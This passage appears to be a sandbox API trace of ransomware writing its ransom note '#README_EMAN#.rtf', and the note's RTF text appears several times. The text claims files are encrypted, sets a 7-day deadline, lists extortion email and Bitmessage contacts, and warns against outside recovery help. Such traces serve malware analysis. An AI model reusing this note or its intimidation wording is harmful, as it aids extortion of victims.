\\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nà ðý\x1dLúj\x8d\x94$á6]jIÑ\x80Cãa âcN", lpUsedDefaultChar=0x0) returned 8717 [0206.383] WriteFile (in: hFile=0x2cc, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0206.384] CloseHandle (hObject=0x2cc) returned 1 [0206.384] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\zhufhjqrom5gmx575z_\\#readme_eman#.rtf")) returned 0xffffffff [0206.384] GetLastError () returned 0x2 [0206.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\zhufhjqrom5gmx575z_\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0206.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 